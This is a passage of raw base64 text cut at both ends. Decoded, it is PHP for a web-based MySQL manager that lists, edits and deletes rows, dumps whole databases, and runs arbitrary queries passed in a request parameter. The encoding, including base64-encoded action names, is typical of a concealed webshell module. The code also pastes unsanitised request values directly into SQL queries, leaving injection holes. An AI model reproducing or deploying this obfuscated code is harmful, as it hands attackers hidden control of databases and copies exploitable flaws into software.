0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+UHJldjwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlByZXY8L2ZvbnQ+IjsNCgllY2hvICIgfCAiOw0KCWlmKCAkcGFnZSA8ICgkcm93LyRyb3dwZXJwYWdlKS0xICkgew0KCQlpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kbWxsZDBSaGRHRT0mZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcGFnZT0iLigkcGFnZSsyKTsNCgkJZWxzZQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1xdWVyeSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSZxdWVyeVN0cj0kcXVlcnlTdHImcGFnZT0iLigkcGFnZSsyKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+TmV4dDwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIk5leHQiOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRyb3cgPiAkcm93cGVycGFnZSApIHsNCgkJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBzaXplPTQgbmFtZT1wYWdlPlxuIjsNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdHbyc+XG4iOw0KCX0NCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjwvZm9udD5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZURhdGEoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBEYXRhPC9oMT5cbiI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKSB7DQoJCWVjaG8gIjxoMT5FZGl0IERhdGE8L2gxPlxuIjsNCgkJJHBSZXN1bHQgPSBteXNxbF9saXN0X2ZpZWxkcyggJGRibmFtZSwgJHRhYmxlbmFtZSApOw0KCQkkbnVtID0gbXlzcWxfbnVtX2ZpZWxkcyggJHBSZXN1bHQgKTsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRpID0gMDsgJGkgPCAkbnVtOyAkaSsrICkgew0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkNCgkJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSIgLiAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIiBBTkQgIjsNCgkJCQllbHNlDQoJCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0nIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJyBBTkQgIjsNCgkJfQ0KCQkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCQlteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCQkkcFJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgPSAgIlNFTEVDVCAqIEZST00gJHRhYmxlbmFtZSBXSEVSRSAka2V5IiwgJG15c3FsSGFuZGxlICk7DQoJCSRkYXRhID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJfQ0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRicgbWV0aG9kPXBvc3Q+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWFkZERhdGFfc3VibWl0PlxuIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1lZGl0RGF0YV9zdWJtaXQ+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT10YWJsZW5hbWUgdmFsdWU9JHRhYmxlbmFtZT5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9Mj5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+TmFtZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5UeXBlPC90aD5cbiI7DQoJZWNobyAiPHRoPkZ1bmN0aW9uPC90aD5cbiI7DQoJZWNobyAiPHRoPkRhdGE8L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCgkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBSZXN1bHQgKTsNCgkkcFJlc3VsdExlbiA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJCSRmaWVsZG5hbWUgPSAkZmllbGRbIkZpZWxkIl07DQoJCSRmaWVsZHR5cGUgPSAkZmllbGRbIlR5cGUiXTsNCgkJJGxlbiA9IG15c3FsX2ZpZWxkX2xlbiggJHBSZXN1bHRMZW4sICRpICk7DQoJCWVjaG8gIjx0cj4iOw0KCQllY2hvICI8dGQ+JGZpZWxkbmFtZTwvdGQ+IjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJUeXBlIl0uIjwvdGQ+IjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiPHNlbGVjdCBuYW1lPSR7ZmllbGRuYW1lfV9mdW5jdGlvbj5cbiI7DQoJCWVjaG8gIjxvcHRpb24+XG4iOw0KCQllY2hvICI8b3B0aW9uPkFTQ0lJXG4iOw0KCQllY2hvICI8b3B0aW9uPkNIQVJcbiI7DQoJCWVjaG8gIjxvcHRpb24+U09VTkRFWFxuIjsNCgkJZWNobyAiPG9wdGlvbj5DVVJEQVRFXG4iOw0KCQllY2hvICI8b3B0aW9uPkNVUlRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+RlJPTV9EQVlTXG4iOw0KCQllY2hvICI8b3B0aW9uPkZST01fVU5JWFRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+Tk9XXG4iOw0KCQllY2hvICI8b3B0aW9uPlBBU1NXT1JEXG4iOw0KCQllY2hvICI8b3B0aW9uPlBFUklPRF9BRERcbiI7DQoJCWVjaG8gIjxvcHRpb24+UEVSSU9EX0RJRkZcbiI7DQoJCWVjaG8gIjxvcHRpb24+VE9fREFZU1xuIjsNCgkJZWNobyAiPG9wdGlvbj5VU0VSXG4iOw0KCQllY2hvICI8b3B0aW9uPldFRUtEQVlcbiI7DQoJCWVjaG8gIjxvcHRpb24+UkFORFxuIjsNCgkJZWNobyAiPC9zZWxlY3Q+XG4iOw0KCQllY2hvICI8L3RkPlxuIjsNCgkJJHZhbHVlID0gaHRtbHNwZWNpYWxjaGFycygkZGF0YVskaV0pOw0KCQlpZiggJGNtZCA9PSAiYWRkIiApIHsNCgkJCSR0eXBlID0gc3RydG9rKCAkZmllbGR0eXBlLCAiICgsKVxuIiApOw0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8fCAkdHlwZSA9PSAic2V0IiApIHsNCgkJCQllY2hvICI8dGQ+XG4iOw0KCQkJCWlmKCAkdHlwZSA9PSAiZW51bSIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZT5cbiI7DQoJCQkJZWxzZSBpZiggJHR5cGUgPT0gInNldCIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZSBzaXplPTQgbXVsdGlwbGU+XG4iOw0KCQkJCXdoaWxlKCAkc3RyID0gc3RydG9rKCAiJyIgKSApIHsNCgkJCQkJZWNobyAiPG9wdGlvbj4kc3RyXG4iOw0KCQkJCQlzdHJ0b2soICInIiApOw0KCQkJCX0NCgkJCQllY2hvICI8L3NlbGVjdD5cbiI7DQoJCQkJZWNobyAiPC90ZD5cbiI7DQoJCQl9IGVsc2Ugew0KCQkJCWlmKCAkbGVuIDwgNDAgKQ0KCQkJCQllY2hvICI8dGQ+PGlucHV0IHR5cGU9dGV4dCBzaXplPTQwIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT48L3RkPlxuIjsNCgkJCQllbHNlDQoJCQkJCWVjaG8gIjx0ZD48dGV4dGFyZWEgY29scz00MCByb3dzPTMgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lPjwvdGV4dGFyZWE+XG4iOw0KCQkJfQ0KCQl9IGVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCQlpZiggJHR5cGUgPT0gImVudW0iIHx8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCWVjaG8gIjx0ZD5cbiI7DQoJCQkJaWYoICR0eXBlID09ICJlbnVtIiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lPlxuIjsNCgkJCQllbHNlIGlmKCAkdHlwZSA9PSAic2V0IiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lIHNpemU9NCBtdWx0aXBsZT5cbiI7DQoJCQkJd2hpbGUoICRzdHIgPSBzdHJ0b2soICInIiApICkgew0KCQkJCQlpZiggJHZhbHVlID09ICRzdHIgKQ0KCQkJCQkJZWNobyAiPG9wdGlvbiBzZWxlY3RlZD4kc3RyXG4iOw0KCQkJCQllbHNlDQoJCQkJCQllY2hvICI8b3B0aW9uPiRzdHJcbiI7DQoJCQkJCXN0cnRvayggIiciICk7DQoJCQkJfQ0KCQkJCWVjaG8gIjwvc2VsZWN0PlxuIjsNCgkJCQllY2hvICI8L3RkPlxuIjsNCgkJCX0gZWxzZSB7DQoJCQkJaWYoICRsZW4gPCA0MCApDQoJCQkJCWVjaG8gIjx0ZD48aW5wdXQgdHlwZT10ZXh0IHNpemU9NDAgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lIHZhbHVlPVwiJHZhbHVlXCI+PC90ZD5cbiI7DQoJCQkJZWxzZQ0KCQkJCQllY2hvICI8dGQ+PHRleHRhcmVhIGNvbHM9NDAgcm93cz0zIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT4kdmFsdWU8L3RleHRhcmVhPlxuIjsNCgkJCX0NCgkJfQ0KCQllY2hvICI8L3RyPiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+PHA+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdBZGQgRGF0YSc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IERhdGEnPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1idXR0b24gdmFsdWU9J0NhbmNlbCcgb25DbGljaz0naGlzdG9yeS5iYWNrKCknPlxuIjsNCgllY2hvICI8L2Zvcm0+XG4iOw0KfQ0KDQpmdW5jdGlvbiBtYW5hZ2VEYXRhX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglpZiggJGNtZCA9PSAiYWRkIiApDQoJCSRxdWVyeVN0ciA9ICJJTlNFUlQgSU5UTyAkdGFibGVuYW1lIFZBTFVFUyAoIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCSRxdWVyeVN0ciA9ICJSRVBMQUNFIElOVE8gJHRhYmxlbmFtZSBWQUxVRVMgKCI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bS0xOyAkaSsrICkgew0KCQkkZmllbGQgPSBteXNxbF9mZXRjaF9maWVsZCggJHBSZXN1bHQgKTsNCgkJJGZ1bmMgPSAkR0xPQkFMU1skZmllbGQtPm5hbWUuIl9mdW5jdGlvbiJdOw0KCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJJHF1ZXJ5U3RyIC49ICIgJGZ1bmMoIjsNCgkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkgew0KCQkJJHF1ZXJ5U3RyIC49ICRHTE9CQUxTWyRmaWVsZC0+bmFtZV07DQoJCQlpZiggJGZ1bmMgIT0gIiIgKQ0KCQkJCSRxdWVyeVN0ciAuPSAiKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiLCI7DQoJCX0gZWxzZSB7DQoJCQkkcXVlcnlTdHIgLj0gIiciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXTsNCgkJCWlmKCAkZnVuYyAhPSAiIiApDQoJCQkJJHF1ZXJ5U3RyIC49ICInKSwiOw0KCQkJZWxzZQ0KCQkJCSRxdWVyeVN0ciAuPSAiJywiOw0KCQl9DQoJfQ0KCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCApOw0KCWlmKCAkZmllbGQtPm51bWVyaWMgPT0gMSApDQoJCSRxdWVyeVN0ciAuPSAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIikiOw0KCWVsc2UNCgkJJHF1ZXJ5U3RyIC49ICInIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJykiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgLCAkbXlzcWxIYW5kbGUgKTsNCgkkZXJyTXNnID0gbXlzcWxfZXJyb3IoKTsNCgl2aWV3RGF0YSggIiIgKTsNCn0NCg0KZnVuY3Rpb24gZGVsZXRlRGF0YSgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkZmllbGRuYW1lLCAkUEhQX1NFTEYsICRxdWVyeVN0ciwgJGVyck1zZzsNCgkkcFJlc3VsdCA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJJG51bSA9IG15c3FsX251bV9maWVsZHMoICRwUmVzdWx0ICk7DQoJJGtleSA9ICIiOw0KCWZvciggJGkgPSAwOyAkaSA8ICRudW07ICRpKysgKSB7DQoJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQlpZiggJGZpZWxkLT5udW1lcmljID09IDEgKQ0KCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0iIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICIgQU5EICI7DQoJCQllbHNlDQoJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSciIC4gJEdMT0JBTFNbJGZpZWxkLT5uYW1lXSAuICInIEFORCAiOw0KCX0NCgkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5U3RyID0gICJERUxFVEUgRlJPTSAkdGFibGVuYW1lIFdIRVJFICRrZXkiOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCXZpZXdEYXRhKCAiIiApOw0KfQ0KDQpmdW5jdGlvbiBmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGUpDQp7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwkZGJuYW1lOw0KCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJJHF1ZXJ5X2lkID0gbXlzcWxfcXVlcnkoIlNIT1cgQ1JFQVRFIFRBQkxFICR0YWJsZSIsJG15c3FsSGFuZGxlKTsNCgkkdGFibGVkdW1wID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5X2lkLCBNWVNRTF9BU1NPQyk7DQoJJHRhYmxlZHVtcCA9ICJEUk9QIFRBQkxFIElGIEVYSVNUUyAkdGFibGU7XG4iIC4gJHRhYmxlZHVtcFsnQ3JlYXRlIFRhYmxlJ10gLiAiO1xuXG4iOw0KCWVjaG8gJHRhYmxlZHVtcDsNCgkvLyBnZXQgZGF0YQ0KCSRyb3dzID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gJHRhYmxlIiwkbXlzcWxIYW5kbGUpOw0KCSRudW1maWVsZHM9bXlzcWxfbnVtX2ZpZWxkcygkcm93cyk7DQoJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcm93cywgTVlTUUxfTlVNKSkNCgl7DQoJCSR0YWJsZWR1bXAgPSAiSU5TRVJUIElOVE8gJHRhYmxlIFZBTFVFUygiOw0KCQkkZmllbGRjb3VudGVyID0gLTE7DQoJCSRmaXJzdGZpZWxkID0gMTsNCgkJLy8gZ2V0IGVhY2ggZmllbGQncyBkYXRhDQoJCXdoaWxlICgrKyRmaWVsZGNvdW50ZXIgPCAkbnVtZmllbGRzKQ0KCQl7DQoJCQlpZiAoISRmaXJzdGZpZWxkKQ0KCQkJew0KCQkJCSR0YWJsZWR1bXAgLj0gJywgJzsNCgkJCX0NCgkJCWVsc2UNCgkJCXsNCgkJCQkkZmlyc3RmaWVsZCA9IDA7DQoJCQl9DQoJCQlpZiAoIWlzc2V0KCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkpDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAnTlVMTCc7DQoJCQl9DQoJCQllbHNlDQoJCQl7DQoJCQkJJHRhYmxlZHVtcCAuPSAiJyIgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRyb3dbIiRmaWVsZGNvdW50ZXIiXSkgLiAiJyI7DQoJCQl9DQoJCX0NCgkJJHRhYmxlZHVtcCAuPSAiKTtcbiI7DQoJCWVjaG8gJHRhYmxlZHVtcDsNCgl9DQoJQG15c3FsX2ZyZWVfcmVzdWx0KCRyb3dzKTsNCn0NCg0KZnVuY3Rpb24gZHVtcCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkYWN0aW9uLCAkZGJuYW1lLCAkdGFibGVuYW1lOw0KCWlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiICl7DQoJCWhlYWRlcigiQ29udGVudC1kaXNwb3NpdGlvbjogZmlsZW5hbWU9JHRhYmxlbmFtZS5zcWwiKTsNCgkJaGVhZGVyKCdDb250ZW50LXR5cGU6IHVua25vd24vdW5rbm93bicpOw0KCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkdGFibGVuYW1lKTsNCgkJZWNobyAiXG5cblxuIjsNCgkJZWNobyAiXHJcblxyXG5cclxuIyMjICR0YWJsZW5hbWUgVEFCTEUgRFVNUCBDT01QTEVURUQgIyMjIjsNCgkJZXhpdDsNCgl9ZWxzZXsNCgkJaGVhZGVyKCJDb250ZW50LWRpc3Bvc2l0aW9uOiBmaWxlbmFtZT0kZGJuYW1lLnNxbCIpOw0KCQloZWFkZXIoJ0NvbnRlbnQtdHlwZTogdW5rbm93bi91bmtub3duJyk7DQoJCW15c3FsX3NlbGVjdF9kYiggJGRibmFtZSwgJG15c3FsSGFuZGxlICk7DQoJCSRxdWVyeV9pZCA9IG15c3FsX3F1ZXJ5KCJTSE9XIHRhYmxlcyIsJG15c3FsSGFuZGxlKTsNCgkJd2hpbGUgKCRyb3cgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnlfaWQsIE1ZU1FMX05VTSkpDQoJCXsNCgkJCQlmZXRjaF90YWJsZV9kdW1wX3NxbCgkcm93WzBdKTsNCgkJCQllY2hvICJcblxuXG4iOw0KCQkJCWVjaG8gIlxyXG5cclxuXHJcbiMjIyAkcm93WzBdIFRBQkxFIERVTVAgQ09NUExFVEVEICMjIyI7DQoJCQkJZWNobyAiXG5cblxuIjsNCgkJfQ0KCQllY2hvICJcclxuXHJcblxyXG4jIyMgJGRibmFtZSBEQVRBQkFTRSBEVU1QIENPTVBMRVRFRCAjIyMiOw0KCQlleGl0Ow0KCX0NCn0NCg0KZnVuY3Rpb24gdXRpbHMoKSB7DQoJZ2xvYmFsICRQSFBfU0VMRiwgJGNvbW1hbmQ7DQoJZWNobyAiPGgxPlV0aWxpdGllczwvaDE+XG4iOw0KCWlmKCAkY29tbWFuZCA9PSAiIiB8fCBzdWJzdHIoICRjb21tYW5kLCAwLCA1ICkgPT0gImZsdXNoIiApIHsNCgkJZWNobyAiPGhyPlxuIjsNCgkJZWNobyAiU2hvd1xuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3ZhcmlhYmxlcyc+VmFyaWFibGVzPC9hPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1zaG93X3Byb2Nlc3NsaXN0Jz5Qcm9jZXNzbGlzdDwvYT5cbiI7DQoJCWVjaG8gIjwvdWw+XG4iOw0KCQllY2hvICJGbHVzaFxuIjsNCgkJZWNobyAiPHVsPlxuIjsNCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9ob3N0cyc+SG9zdHM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX2hvc3RzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGhvc3RzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPGxpPjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMmY29tbWFuZD1mbHVzaF9sb2dzJz5Mb2dzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9sb2dzIiApIHsNCgkJCWlmKCBteXNxbF9xdWVyeSggIkZsdXNoIGxvZ3MiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3ByaXZpbGVnZXMnPlByaXZpbGVnZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3ByaXZpbGVnZXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggcHJpdmlsZWdlcyIgKSAhPSBmYWxzZSApDQoJCQkJZWNobyAiLSBTdWNjZXNzIjsNCgkJCWVsc2UNCgkJCQllY2hvICItIEZhaWwiOw0KCQl9DQoJCWVjaG8gIjxsaT48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXV0aWxzJmNvbW1hbmQ9Zmx1c2hfdGFibGVzJz5UYWJsZXM8L2E+XG4iOw0KCQlpZiggJGNvbW1hbmQgPT0gImZsdXNoX3RhYmxlcyIgKSB7DQoJCQlpZiggbXlzcWxfcXVlcnkoICJGbHVzaCB0YWJsZXMiICkgIT0gZmFsc2UgKQ0KCQkJCWVjaG8gIi0gU3VjY2VzcyI7DQoJCQllbHNlDQoJCQkJZWNobyAiLSBGYWlsIjsNCgkJfQ0KCQllY2hvICI8bGk+PGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj11dGlscyZjb21tYW5kPWZsdXNoX3N0YXR1cyc+U3RhdHVzPC9hPlxuIjsNCgkJaWYoICRjb21tYW5kID09ICJmbHVzaF9zdGF0dXMiICkgew0KCQkJaWYoIG15c3FsX3F1ZXJ5KCAiRmx1c2ggc3RhdHVzIiApICE9IGZhbHNlICkNCgkJCQllY2hvICItIFN1Y2Nlc3MiOw0KCQkJZWxzZQ0KCQkJCWVjaG8gIi0gRmFpbCI7DQoJCX0NCgkJZWNobyAiPC91bD5cbiI7DQoJfSBlbHNlIHsNCgkJJHF1ZXJ5U3RyID0gZXJlZ19yZXBsYWNlKCAiXyIsICIgIiwgJGNvbW1hbmQgKTsNCgkJJHBSZXN1bHQgPSBteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICk7DQoJCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJCWVjaG8gIkZhaWwiOw0KCQkJcmV0dXJuOw0KCQl9DQoJCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCQllY2hvICI8cCBjbGFzcz1sb2NhdGlvbj4kcXVlcnlTdHI8L3A+XG4iOw0KCQllY2hvICI8aHI+XG4iOw0KCQllY2hvICI8dGFibGUgY2VsbHNwYWNpbmc9MSBjZWxscGFkZGluZz0yIGJvcmRlcj0wPlxuIjsNCgkJZWNobyAiPHRyPlxuIjsNCgkJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJCSRmaWVsZCA9IG15c3FsX2ZldGNoX2ZpZWxkKCAkcFJlc3VsdCwgJGkgKTsNCgkJCWVjaG8gIjx0aD4iLiRmaWVsZC0+bmFtZS4iPC90aD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJCXdoaWxlKCAxICkgew0KCQkJJHJvd0FycmF5ID0gbXlzcWxfZmV0Y2hfcm93KCAkcFJlc3VsdCApOw0KCQkJaWYoICRyb3dBcnJheSA9PSBmYWxzZSApIGJyZWFrOw0KCQkJZWNobyAiPHRyPlxuIjsNCgkJCWZvciggJGogPSAwOyAkaiA8ICRjb2w7ICRqKysgKQ0KCQkJCWVjaG8gIjx0ZD4iLmh0bWxzcGVjaWFsY2hhcnMoICRyb3dBcnJheVskal0gKS4iPC90ZD5cbiI7DQoJCQllY2hvICI8L3RyPlxuIjsNCgkJfQ0KCQllY2hvICI8L3RhYmxlPlxuIjsNCgl9DQp9DQpmdW5jdGlvbiBmb290ZXJfaHRtbCgpIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkUEhQX1NFTEYsICRVU0VSTkFNRTsNCgllY2hvICI8aHI+XG4iOw0KCWVjaG8gIjxzcGFuIGNsYXNzPVwibmV3XCI+WyRVU0VSTkFNRV08L3NwYW4+IC0gXG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249YkdsemRFUkNjdz09Jz5EYXRhYmFzZSBMaXN0PC9hPiB8IFxuIjsNCglpZiggJHRhYmxlbmFtZSAhPSAiIiApDQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bGlzdFRhYmxlcyZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+VGFibGUgTGlzdDwvYT4gfCAiOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dXRpbHMnPlV0aWxzPC9hPiB8XG4iOw0KCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249bG9nb3V0Jz5Mb2dvdXQ8L2E+XG4iOw0KfQ0KLy8tLS0tLS0tLS0tLS0tIE1BSU4gLS0tLS0tLS0tLS0tLS